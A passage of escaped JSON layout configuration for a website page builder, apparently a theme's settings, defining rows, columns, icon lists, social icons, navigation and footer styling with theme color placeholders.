\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"background\":{\"overlay\":{\"enabled\":false,\"color\":{\"value\":\"${theme.colors.1}\"},\"type\":\"gradient\"}}},\"frameImage\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"10\",\"unit\":\"px\",\"path\":\"value\"},\"color\":\"${theme.colors.1}\"}},\"backgroundColor\":\"${theme.colors.1}\",\"zIndex\":-1,\"transform\":{\"translate\":{\"x\":{\"path\":\"value\",\"value\":\"7\"},\"y\":{\"path\":\"value\",\"value\":-8}}},\"height\":{\"path\":\"value\",\"value\":\"120\"},\"width\":{\"path\":\"value\",\"value\":100}}}},\"props\":{\"enabledFrameOption\":true,\"frame\":{\"type\":\"background\"},\"showFrameOverImage\":false,\"showFrameShadow\":true},\"nodes\":[\"22-h30\"]},{\"id\":222,\"type\":\"hop-down-arrow\",\"v\":\"1.1\",\"props\":{\"type\":\"icon\"},\"style\":{\"bottom\":{\"value\":\"20\"}},\"nodes\":[\"22-h31\"]},{\"id\":223,\"type\":\"hop-down-arrow-scroll-button-group\",\"v\":\"1.1\",\"nodes\":[\"22-h32\"]},{\"id\":224,\"type\":\"hop-down-arrow-scroll-button\",\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"props\":{\"buttonSize\":\"medium\",\"buttonWidth\":\"fitToContent\"},\"nodes\":[\"22-h33\"]},{\"id\":225,\"type\":\"hop-down-arrow-scroll-icon\",\"style\":{\"descendants\":{\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"40\"},\"height\":{\"path\":\"value\",\"value\":\"40\"},\"fill\":\"${theme.colors.4}\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h34\"]},{\"id\":226,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":227,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":228,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"v\":\"1.1\"},{\"id\":229,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"22-h32\"]},{\"id\":230,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h33\"]},{\"id\":231,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\",\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"22-h34\"]},{\"id\":232,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"22-h35\"]},{\"id\":233,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\",\"nodes\":[\"22-h36\"]},{\"id\":234,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"22-h37\"]},{\"id\":243,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"22-h69\",\"nodes\":[\"22-h69\"],\"v\":\"1.1\"},{\"id\":244,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":0,\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":0,\"path\":\"value\"}},\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":0},\"bottom\":{\"unit\":\"px\",\"value\":0}}},\"ancestor\":{\"sticky\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":10},\"bottom\":{\"unit\":\"px\",\"value\":10}},\"background\":{\"color\":\"#ffffff\"}}},\"background\":{\"color\":\"#ffffff\"}},\"type\":\"hop-navigation\",\"nodeId\":\"22-h81\",\"nodes\":[\"22-h2\"],\"v\":\"1.1\",\"props\":{\"sticky\":true,\"showTopBar\":false,\"overlap\":false}},{\"id\":245,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"fullBackground\":false,\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}}},\"type\":\"hop-row\",\"nodeId\":\"22-h82\",\"nodes\":[\"22-h3\"],\"v\":\"1.1\"},{\"id\":246,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"22-h83\",\"nodes\":[\"22-h4\"],\"v\":\"1.1\"},{\"id\":247,\"type\":\"hop-logo\",\"nodeId\":\"22-h84\",\"nodes\":[\"22-h5\"],\"v\":\"1.1\"},{\"id\":248,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"22-h85\",\"nodes\":[\"22-h6\"],\"v\":\"1.1\"},{\"id\":249,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"22-h86\",\"nodes\":[\"22-h7\"],\"v\":\"1.1\"},{\"id\":250,\"type\":\"hop-horizontal-menu\",\"nodeId\":\"22-h87\",\"nodes\":[\"22-h8\"],\"v\":\"1.1\"},{\"id\":251,\"type\":\"hop-mobile-menu\",\"nodeId\":\"22-h88\",\"nodes\":[\"22-h9\"],\"v\":\"1.1\"},{\"id\":252,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"22-h89\",\"nodes\":[\"22-h10\"],\"v\":\"1.1\"},{\"id\":253,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"22-h90\",\"nodes\":[\"22-h11\"],\"v\":\"1.1\"},{\"id\":254,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-row\",\"nodeId\":\"22-h91\",\"nodes\":[\"22-h12\"],\"v\":\"1.1\"},{\"id\":255,\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"type\":\"hop-column\",\"nodeId\":\"22-h92\",\"nodes\":[\"22-h13\"],\"v\":\"1.1\"},{\"id\":256,\"type\":\"hop-logo\",\"nodeId\":\"22-h93\",\"nodes\":[\"22-h14\"],\"v\":\"1.1\"},{\"id\":257,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-row\",\"nodeId\":\"22-h94\",\"nodes\":[\"22-h15\"],\"v\":\"1.1\"},{\"id\":258,\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"type\":\"hop-column\",\"nodeId\":\"22-h95\",\"nodes\":[\"22-h16\"],\"v\":\"1.1\"},{\"id\":259,\"type\":\"hop-text\",\"nodeId\":\"22-h96\",\"nodes\":[\"22-h17\"],\"v\":\"1.1\"},{\"id\":260,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"22-h18\"]},{\"id\":261,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h19\"]},{\"id\":262,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"22-h20\"]},{\"id\":263,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"22-h21\"]},{\"id\":264,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h22\"]},{\"id\":265,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"22-h23\"]},{\"id\":266,\"type\":\"hop-footer\",\"v\":\"1.1\",\"nodes\":[\"28-f1\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"useFooterParallax\":true}},{\"id\":267,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"30\"},\"bottom\":{\"path\":\"value\",\"value\":\"30\"}},\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":\"115\"},\"type\":\"min-height\"}},\"v\":\"1.1\",\"nodes\":[\"28-f2\"],\"props\":{\"verticalAlign\":\"end\"}},{\"id\":268,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":1,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"28-f3\"]},{\"id\":269,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":1,\"verticalInnerGap\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"28-f4\"]},{\"id\":270,\"type\":\"hop-copyright\",\"v\":\"1.1\",\"nodes\":[\"28-f5\"]},{\"id\":271,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},\"descendants\":{\"inner\":{\"margin\":{\"top\":{\"value\":-75,\"unit\":\"px\",\"path\":\"value\"}}}},\"background\":{\"color\":\"rgba(255, 255, 255, 0.43)\"}},\"v\":\"1.1\",\"nodes\":[\"20-c2\"]},{\"id\":272,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":3},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}},\"tablet\":{\"layout\":{\"horizontalGap\":0,\"verticalGap\":0}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"20-c9\"]},{\"id\":273,\"type\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"verticalInnerGap\":2}},\"tablet\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}}},\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"tablet\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"tablet\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"20-c10\",\"20-c14\",\"20-c18\"]},{\"id\":274,\"type\":\"hop-icon\",\"style\":{\"descendants\":{\"icon\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"${theme.colors.0}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"},\"right\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"}},\"width\":{\"path\":\"value\",\"value\":\"80\"},\"height\":{\"path\":\"value\",\"value\":\"80\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(49, 52, 57, 